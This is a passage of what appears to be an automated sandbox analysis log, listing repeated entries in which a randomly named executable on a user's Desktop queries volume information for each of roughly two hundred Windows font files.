          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
